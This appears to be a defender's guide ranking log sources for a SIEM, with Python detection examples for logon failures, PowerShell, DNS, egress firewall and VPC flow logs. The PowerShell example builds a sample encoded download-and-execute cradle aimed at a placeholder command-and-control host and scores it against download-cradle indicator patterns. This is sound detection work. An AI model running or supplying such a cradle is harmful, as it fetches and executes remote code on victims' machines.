Essential Log Types for Effective SIEM Deployment

SIEM Logs

In the realm of cybersecurity, the ability to monitor, detect, and respond to incidents is critical. Security Information and Event Management (SIEM) systems are central to this effort, offering real-time analysis of security alerts generated by applications and network hardware.

For a SIEM to be effective, it requires a comprehensive and prioritized collection of event logs. The following list, though subject to customization per organizational needs, outlines the essential logs to collect, starting with those of highest priority.

1. Security Product Logs (EDR/AV/HIPS/IPS)

Endpoint Detection and Response (EDR), Antivirus (AV), Host-based Intrusion Prevention Systems (HIPS), and Intrusion Prevention Systems (IPS) logs are vital as they provide insights into malware activity, potential intrusions, and endpoint behaviors. These logs are often the first line of defense, offering detailed information on security events.

2. Windows DC Event Logs / LDAP Logs

Windows Domain Controller (DC) Event Logs and LDAP Logs are critical for monitoring authentication activities, user permissions, and potential security breaches within a Windows environment. They help in tracking login attempts, user access patterns, and changes to directory services.
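The two patterns a SIEM most often hunts for in DC logon-failure events are a single source failing against many accounts (password spray) and a single source hammering one account (brute force). The following is an added example, not code from the original post: it assumes Event ID 4625 records ("An account failed to log on") have already been parsed out of the Security log into dicts with the `TargetUserName`, `IpAddress` and timestamp fields used below, and the sample events are constructed.

```python
"""Added example (not from the original post): password-spray and brute-force
detection over Windows Domain Controller logon failures.

Assumes Event ID 4625 records have already been parsed out of the Security log
into dicts with the fields used below; the sample events are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta


def _ev(time, user, ip):
    # 0xC000006D = unknown user name or bad password (the usual spray status)
    return {"EventID": 4625, "time": time, "TargetUserName": user,
            "IpAddress": ip, "Status": "0xC000006D"}


# Constructed sample: one source tries six different accounts in six seconds
# (spray), another fails seven times against one service account (brute
# force), and one user mistypes a password once (benign noise).
SAMPLE_4625 = (
    [_ev(f"2024-05-01T08:00:{s:02d}", u, "10.0.0.50")
     for s, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    + [_ev(f"2024-05-01T09:{15 + m:02d}:00", "svc_backup", "10.0.0.77") for m in range(7)]
    + [_ev("2024-05-01T10:30:00", "bob", "10.0.0.12")]
)


def _failures(events):
    """Yield (source IP, account, timestamp) for every 4625 event."""
    for ev in events:
        if ev.get("EventID") == 4625:
            yield ev["IpAddress"], ev["TargetUserName"], datetime.fromisoformat(ev["time"])


def detect_password_spray(events, min_accounts=5, window=timedelta(minutes=10)):
    """Sources that failed against at least `min_accounts` distinct accounts
    inside some `window`-long interval. Returns {ip: set_of_accounts}."""
    by_ip = defaultdict(list)
    for ip, user, t in _failures(events):
        by_ip[ip].append((t, user))
    findings = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        for i, (t0, _) in enumerate(attempts):
            accounts = {user for t, user in attempts[i:] if t - t0 <= window}
            if len(accounts) >= min_accounts:
                findings[ip] = accounts
                break
    return findings


def detect_brute_force(events, min_failures=5, window=timedelta(minutes=10)):
    """(ip, account) pairs with at least `min_failures` failures inside some
    `window`-long interval. Returns {(ip, account): count}."""
    by_key = defaultdict(list)
    for ip, user, t in _failures(events):
        by_key[(ip, user)].append(t)
    findings = {}
    for key, times in by_key.items():
        times.sort()
        for i, t0 in enumerate(times):
            n = sum(1 for t in times[i:] if t - t0 <= window)
            if n >= min_failures:
                findings[key] = n
                break
    return findings


if __name__ == "__main__":
    print("spray:", detect_password_spray(SAMPLE_4625))
    print("brute force:", detect_brute_force(SAMPLE_4625))
```

The thresholds (five accounts or five failures inside ten minutes) are deliberately low so the sample triggers; in production they are tuned against the domain's normal failure rate, and the spray rule is usually keyed on the source IP or workstation name because the account names vary by design.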

3. Web Proxy Requests

Logs from Web Proxy Servers capture web traffic details, allowing organizations to monitor and control web access. These logs are useful for identifying suspicious web activity, blocking malicious sites, and ensuring compliance with browsing policies.

4. PowerShell Logs

PowerShell Logs are essential for monitoring script executions and identifying potentially malicious activities. PowerShell is a powerful tool often used by attackers for lateral movement and data exfiltration; thus, logging its usage helps in early threat detection.
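A common triage step on logged PowerShell text is to decode any Base64 `-EncodedCommand` argument and score both the raw and decoded text against a list of indicators, so that encoding does not hide them. The block below is an added example, not code from the original post: it works on Script Block Logging text (Event ID 4104, `ScriptBlockText`) and on process-creation command lines (Event ID 4688) where the encoded form appears; the indicator list, its weights, the `c2.example.invalid` placeholder host and the sample records are all constructed for this example.

```python
"""Added example (not from the original post): triage of logged PowerShell
command text. Indicator list, weights and sample records are constructed."""
import base64
import re

# Indicator patterns found in most published detection rules; the weights are an
# assumption made for this example, not a vendor scoring scheme.
INDICATORS = {
    r"invoke-expression|\biex\b": 2,
    r"downloadstring|invoke-webrequest|net\.webclient": 2,
    r"frombase64string": 1,
    r"-nop\b|-noprofile": 1,
    r"-w(indowstyle)?\s+hidden": 1,
    r"executionpolicy\s+bypass": 1,
}

# -e / -ec / -enc / -encodedcommand followed by a Base64 blob
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(text):
    """Return the UTF-16LE payload of an -EncodedCommand argument, or None."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(text):
    """Score the text and, if present, its decoded payload. Returns
    (score, decoded_payload_or_None, sorted list of matched patterns)."""
    decoded = decode_encoded_command(text)
    views = [text] + ([decoded] if decoded else [])
    matched = set()
    for view in views:
        low = view.lower()
        for pattern in INDICATORS:
            if re.search(pattern, low):
                matched.add(pattern)
    # the presence of an encoded command is itself a weak signal (+1)
    score = sum(INDICATORS[p] for p in matched) + (1 if decoded else 0)
    return score, decoded, sorted(matched)


# Constructed sample records: a routine admin one-liner and an encoded download
# cradle pointing at a placeholder host (example.invalid never resolves).
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"
_B64 = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_RECORDS = [
    {"EventID": 4104, "text": "Get-ChildItem C:\\Users | Where-Object { $_.PSIsContainer }"},
    {"EventID": 4688, "text": f"powershell.exe -nop -w hidden -enc {_B64}"},
]


def triage(records, threshold=3):
    """Records whose score reaches `threshold`, with the decoded payload attached
    so the analyst sees what would actually have run."""
    out = []
    for rec in records:
        score, decoded, hits = score_command(rec["text"])
        if score >= threshold:
            out.append({"EventID": rec["EventID"], "score": score,
                        "decoded": decoded, "hits": hits})
    return out


if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(finding)
```

Scoring the decoded view is the point: the raw 4688 command line only exposes `-nop -w hidden -enc`, while the decoded payload carries the download-and-execute indicators that push the record over the threshold. Script Block Logging (4104) already records the decoded script, so the same scorer applies to it unchanged.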

5. DNS Queries (with endpoint name/IP)

DNS Query Logs provide visibility into domain name resolution activities. Logging DNS queries, along with endpoint names and IP addresses, helps in identifying command-and-control communication, phishing attempts, and other DNS-based threats.
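Two DNS-based threats called out above leave measurable traces in query logs: algorithmically generated domains tend to be long, high-entropy labels that mostly return NXDOMAIN, and DNS tunnelling shows up as one endpoint querying very many distinct subdomains of a single domain. The following is an added example, not code from the original post; the log line layout (timestamp, client IP, endpoint name, query name, response code), the thresholds, the naive second-level-label split used in place of a public-suffix lookup, and every record are constructed for this example, and `example.invalid` is a placeholder domain.

```python
"""Added example (not from the original post): DGA-style and tunnelling-style
detection over DNS query logs. Log format, thresholds and records are
constructed; real resolver logs differ in layout."""
import math
from collections import Counter, defaultdict

SAMPLE_DNS_LOG = """\
2024-05-01T10:00:01 10.0.1.21 WS-021 www.microsoft.com NOERROR
2024-05-01T10:00:02 10.0.1.21 WS-021 login.live.com NOERROR
2024-05-01T10:00:03 10.0.1.33 WS-033 xk7qpz9vb2lm3wd8.net NXDOMAIN
2024-05-01T10:00:04 10.0.1.33 WS-033 q0w9e8r7t6y5u4i3.com NXDOMAIN
2024-05-01T10:00:05 10.0.1.33 WS-033 a1s2d3f4g5h6j7k8.org NXDOMAIN
2024-05-01T10:00:06 10.0.1.21 WS-021 update.microsoft.com NOERROR
"""
# Thirty queries for distinct subdomains of one placeholder domain from one
# host: the shape that encoding data into query names leaves in resolver logs.
SAMPLE_DNS_LOG += "".join(
    f"2024-05-01T10:01:{i:02d} 10.0.1.40 WS-040 "
    f"{i:04x}{(i * 7919) % 65536:04x}.tun.example.invalid NOERROR\n"
    for i in range(30)
)


def parse_dns_log(text):
    """Parse the constructed five-column format into dicts."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, endpoint, qname, rcode = line.split()
        records.append({"time": ts, "client": client, "endpoint": endpoint,
                        "qname": qname.lower().rstrip("."), "rcode": rcode})
    return records


def shannon_entropy(s):
    """Bits per character of the string's character distribution."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_label(qname):
    """Second-to-last label; a naive stand-in for public-suffix parsing (assumption)."""
    labels = qname.split(".")
    return labels[-2] if len(labels) >= 2 else qname


def find_dga_candidates(records, min_len=12, min_entropy=3.5):
    """Query names whose registrable label is both long and high-entropy."""
    hits = set()
    for r in records:
        label = registrable_label(r["qname"])
        if len(label) >= min_len and shannon_entropy(label) >= min_entropy:
            hits.add(r["qname"])
    return hits


def find_tunneling(records, min_unique=20):
    """(endpoint, domain) pairs that queried many distinct names under one domain."""
    seen = defaultdict(set)
    for r in records:
        labels = r["qname"].split(".")
        domain = ".".join(labels[-2:])
        seen[(r["endpoint"], domain)].add(r["qname"])
    return {k: len(v) for k, v in seen.items() if len(v) >= min_unique}


def nxdomain_ratio(records):
    """Share of NXDOMAIN answers per endpoint; high values accompany DGA activity."""
    total, nx = Counter(), Counter()
    for r in records:
        total[r["endpoint"]] += 1
        if r["rcode"] == "NXDOMAIN":
            nx[r["endpoint"]] += 1
    return {e: nx[e] / total[e] for e in total}


if __name__ == "__main__":
    recs = parse_dns_log(SAMPLE_DNS_LOG)
    print("DGA candidates:", find_dga_candidates(recs))
    print("tunnelling:", find_tunneling(recs))
    print("NXDOMAIN ratio:", nxdomain_ratio(recs))
```

The endpoint name and client IP are what make these findings actionable: entropy alone would also flag CDN and cloud-storage hostnames, so production rules pair it with the NXDOMAIN ratio and an allow-list, and the per-endpoint grouping is what turns a pile of odd queries into one host to investigate.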

6. Firewall (Egress Only)

Firewall Logs, specifically for egress traffic, are crucial for monitoring outbound connections from the network. They help in detecting unauthorized data exfiltration, identifying compromised systems, and ensuring policy compliance.
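Egress logs support a small set of high-value aggregations: total outbound bytes per internal host compared with its peers, external destinations that only one host talks to at volume, and denied outbound attempts. The block below is an added example, not code from the original post; the key=value log format, the internal address ranges, the thresholds and every record are constructed, and the TEST-NET addresses (203.0.113.x, 198.51.100.x) stand in for real external destinations.

```python
"""Added example (not from the original post): outbound-volume outlier detection
over egress firewall logs. Log format, internal ranges and records are constructed."""
import ipaddress
import statistics
from collections import defaultdict

# Assumption for this example: the firewall's "inside" zone is RFC 1918 space.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def _line(ts, src, dst, dport, bytes_out, action="allow"):
    return f"{ts} action={action} src={src} dst={dst} dport={dport} proto=tcp bytes_out={bytes_out}"


# Constructed sample: five workstations browse one site at ~40 KB per session;
# one of them also pushes ~400 MB to a destination no other host contacts;
# one host has an outbound attempt denied on a blocked port.
SAMPLE_FW_LOG = "\n".join(
    [_line(f"2024-05-01T09:{m:02d}:00", f"10.0.2.{h}", "203.0.113.10", 443, 40_000 + h * m)
     for h in range(11, 16) for m in range(10)]
    + [_line(f"2024-05-01T09:{m:02d}:30", "10.0.2.15", "198.51.100.7", 443, 40_000_000)
       for m in range(10)]
    + [_line("2024-05-01T09:05:00", "10.0.2.12", "198.51.100.9", 4444, 0, action="deny")]
)


def parse_fw_log(text):
    """Parse 'timestamp k=v k=v ...' lines into dicts with numeric port and byte fields."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        rec = {"time": parts[0]}
        for kv in parts[1:]:
            k, _, v = kv.partition("=")
            rec[k] = v
        rec["dport"] = int(rec["dport"])
        rec["bytes_out"] = int(rec["bytes_out"])
        records.append(rec)
    return records


def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def is_egress(rec):
    return is_internal(rec["src"]) and not is_internal(rec["dst"])


def outbound_volume_outliers(records, factor=10.0):
    """Hosts whose allowed outbound byte total exceeds `factor` times the median host total."""
    totals = defaultdict(int)
    for r in records:
        if r["action"] == "allow" and is_egress(r):
            totals[r["src"]] += r["bytes_out"]
    if not totals:
        return {}
    median = statistics.median(totals.values())
    return {h: t for h, t in totals.items() if t > factor * median}


def rare_destinations(records, max_sources=1, min_bytes=1_000_000):
    """External destinations reached by at most `max_sources` internal hosts with
    at least `min_bytes` sent: the classic staging-server signature."""
    sources, volume = defaultdict(set), defaultdict(int)
    for r in records:
        if r["action"] == "allow" and is_egress(r):
            sources[r["dst"]].add(r["src"])
            volume[r["dst"]] += r["bytes_out"]
    return {d: volume[d] for d in sources if len(sources[d]) <= max_sources and volume[d] >= min_bytes}


def denied_egress(records):
    """Outbound connections the policy blocked, worth reviewing per source host."""
    return [(r["src"], r["dst"], r["dport"]) for r in records
            if r["action"] == "deny" and is_egress(r)]


if __name__ == "__main__":
    recs = parse_fw_log(SAMPLE_FW_LOG)
    print("volume outliers:", outbound_volume_outliers(recs))
    print("rare destinations:", rare_destinations(recs))
    print("denied egress:", denied_egress(recs))
```

The internal ranges are declared explicitly rather than derived from `ipaddress`'s `is_private`/`is_global` flags, because those flags classify documentation and other special-purpose ranges in ways that do not match a firewall's zone model; in a real deployment the list comes from the firewall's own zone definitions.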

7. VPN Logs

VPN Logs are important for tracking remote access to the network. They provide information on user connections, session durations, and potential anomalies, which are crucial for identifying unauthorized access and securing remote work environments.

8. Google Cloud Logging

Google Cloud Logging captures events within Google Cloud environments, including access logs, system events, and application logs. These logs are vital for maintaining security and compliance in cloud deployments.

9. AWS CloudWatch

AWS CloudWatch logs provide comprehensive monitoring of AWS resources and applications. They include performance metrics, resource utilization, and security events, aiding in the detection of potential threats and anomalies in AWS environments.

10. Microsoft M365 UnifiedAuditLog

The Microsoft M365 UnifiedAuditLog consolidates logs from various Microsoft 365 services, providing a unified view of user activities, administrative actions, and security events. This is essential for monitoring and securing the Microsoft 365 environment.

11. Microsoft AzureAD Sign-In Logs

AzureAD Sign-In Logs capture user authentication attempts to Azure services. These logs are critical for detecting suspicious login activities, brute force attacks, and unauthorized access to Azure resources.

12. Microsoft Cloud App Security Logs

Microsoft Cloud App Security Logs offer insights into cloud application activities, including user behaviors, threat detections, and policy violations. These logs help in securing cloud applications and enforcing security policies.

13. Microsoft AzureAD Identity Protection

AzureAD Identity Protection logs provide information on risk detections and automated responses to identity-based threats. These logs are crucial for identifying and mitigating identity-related security risks.

14. Microsoft M365 Defender for Identity

Microsoft M365 Defender for Identity (formerly Azure ATP) logs monitor and detect advanced threats, compromised identities, and malicious insider actions. These logs are important for protecting the organization’s identity infrastructure.

15. Linux osquery Logs

Linux osquery Logs collect detailed information about Linux systems, including process activities, file integrity changes, and network connections. They are useful for monitoring and securing Linux environments.

16. Windows Member Server Event Logs

Windows Member Server Event Logs capture security events, system activities, and application logs on Windows servers. These logs help in monitoring server performance and identifying potential security incidents.

17. Windows Workstation Event Logs

Windows Workstation Event Logs provide insights into user activities, system events, and application usage on Windows workstations. They are essential for detecting and responding to security incidents on user devices.

18. Linux auditd Logs

Linux auditd Logs capture detailed auditing information on Linux systems, including user actions, system calls, and security events. These logs are important for maintaining security and compliance in Linux environments.

19. Email Logs

Email Logs capture information about email traffic, including sent and received messages, attachments, and spam detections. These logs are vital for detecting phishing attacks, spam, and email-based threats.

20. Custom Application Logs

Custom Application Logs collect event data from bespoke applications. These logs are necessary for monitoring application performance, detecting anomalies, and ensuring application security.

21. Firewall (General)

General Firewall Logs capture both ingress and egress traffic, providing a comprehensive view of network activities. These logs help in monitoring for unauthorized access, policy violations, and potential threats.

22. DHCP Logs

DHCP Logs track the assignment of IP addresses within the network. These logs are useful for identifying devices, tracking network changes, and detecting rogue devices.

23. NetFlow

NetFlow Logs provide detailed information about network traffic flows, including source and destination addresses, protocols, and volume of data transferred. These logs are important for network monitoring and detecting anomalies.

24. AWS VPC Flow Logs

AWS VPC Flow Logs capture information about the IP traffic going to and from network interfaces in an Amazon VPC. These logs are critical for monitoring network traffic, identifying security threats, and ensuring compliance in AWS environments.
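VPC Flow Logs in the default format are space-separated records with fourteen fields (`version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status`), and records with a `NODATA` or `SKIPDATA` status carry `-` in the traffic fields, which a parser has to tolerate. The block below is an added example, not code from the original post or from AWS: it parses that format and flags two things an analyst looks for first, a source that is rejected on many ports of one host in a short window and accepted connections to administrative ports from outside the VPC. The account id, ENI id, addresses, the assumption that the VPC lives in 10.0.0.0/8, and all records are constructed placeholders.

```python
"""Added example (not from the original post or AWS): parsing AWS VPC Flow Logs
in the default format and flagging scan-like rejects and external admin access.
Account id, ENI id, addresses and records are constructed placeholders."""
from collections import defaultdict

FIELDS = ("version", "account_id", "interface_id", "srcaddr", "dstaddr", "srcport",
          "dstport", "protocol", "packets", "bytes", "start", "end", "action", "log_status")
INT_FIELDS = {"version", "srcport", "dstport", "protocol", "packets", "bytes", "start", "end"}

# Constructed sample: 15 rejected probes against consecutive ports of one
# instance inside 15 seconds, then an accepted SSH session from the same
# external source, an ordinary internal HTTPS flow, and a NODATA record.
SAMPLE_FLOW_LOG = "\n".join(
    ["version account-id interface-id srcaddr dstaddr srcport dstport protocol "
     "packets bytes start end action log-status"]
    + [f"2 123456789012 eni-0a1b2c3d4e5f67890 198.51.100.23 10.0.1.10 51000 {p} 6 1 44 "
       f"{1714554000 + i} {1714554000 + i + 1} REJECT OK"
       for i, p in enumerate(range(20, 35))]
    + ["2 123456789012 eni-0a1b2c3d4e5f67890 198.51.100.23 10.0.1.10 51020 22 6 12 1800 "
       "1714554020 1714554080 ACCEPT OK",
       "2 123456789012 eni-0a1b2c3d4e5f67890 10.0.1.10 10.0.1.20 44000 443 6 8 1200 "
       "1714554000 1714554060 ACCEPT OK",
       "2 123456789012 eni-0a1b2c3d4e5f67890 - - - - - - - 1714554000 1714554060 - NODATA"]
)


def parse_flow_log(text):
    """Parse default-format flow log lines; skips a header line and malformed rows,
    and leaves '-' in place for fields that NODATA/SKIPDATA records do not fill."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] == "version":
            continue
        if len(parts) != len(FIELDS):
            continue  # a real pipeline should count these rather than drop silently
        records.append({f: (int(v) if f in INT_FIELDS and v != "-" else v)
                        for f, v in zip(FIELDS, parts)})
    return records


def rejected_port_sweeps(records, min_ports=10, window=60):
    """(src, dst) pairs with REJECTs on at least `min_ports` distinct destination
    ports within `window` seconds. Returns {(src, dst): distinct_port_count}."""
    by_pair = defaultdict(list)
    for r in records:
        if r["log_status"] == "OK" and r["action"] == "REJECT":
            by_pair[(r["srcaddr"], r["dstaddr"])].append((r["start"], r["dstport"]))
    findings = {}
    for pair, flows in by_pair.items():
        flows.sort()
        for i, (t0, _) in enumerate(flows):
            ports = {p for t, p in flows[i:] if t - t0 <= window}
            if len(ports) >= min_ports:
                findings[pair] = len(ports)
                break
    return findings


def accepted_admin_ingress(records, admin_ports=(22, 3389), internal_prefix="10."):
    """Accepted flows to admin ports from outside the VPC range (assumed 10.0.0.0/8)."""
    return [(r["srcaddr"], r["dstaddr"], r["dstport"]) for r in records
            if r["log_status"] == "OK" and r["action"] == "ACCEPT"
            and r["dstport"] in admin_ports and not r["srcaddr"].startswith(internal_prefix)]


if __name__ == "__main__":
    recs = parse_flow_log(SAMPLE_FLOW_LOG)
    print("port sweeps:", rejected_port_sweeps(recs))
    print("external admin access:", accepted_admin_ingress(recs))
```

Keeping the `NODATA` record rather than discarding it matters for one common investigation question, whether an interface was actually quiet or whether logging stopped; the `log-status` field is the only place that distinction is recorded. The same parser serves Google VPC Flow Logs or Azure NSG flow logs only after swapping the field table, since each provider uses its own layout.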

25. Google VPC Flow Logs

Google VPC Flow Logs provide visibility into network traffic within Google Cloud environments. They help in monitoring traffic patterns, detecting unauthorized access, and securing cloud resources.

26. Microsoft Network Security Group Flow Logs

Microsoft Network Security Group (NSG) Flow Logs capture information about network traffic to and from Azure resources. These logs are essential for monitoring and securing Azure network traffic.

27. Full Packet Capture

Full Packet Capture logs record all network traffic, providing the most granular level of network monitoring. These logs are invaluable for detailed forensic analysis, investigating security incidents, and understanding network behaviors.

In conclusion, the prioritized collection of these event logs into your SIEM is crucial for maintaining a robust security posture. By continuously monitoring these logs, organizations can detect and respond to threats more effectively, ensuring the security and integrity of their IT environments.
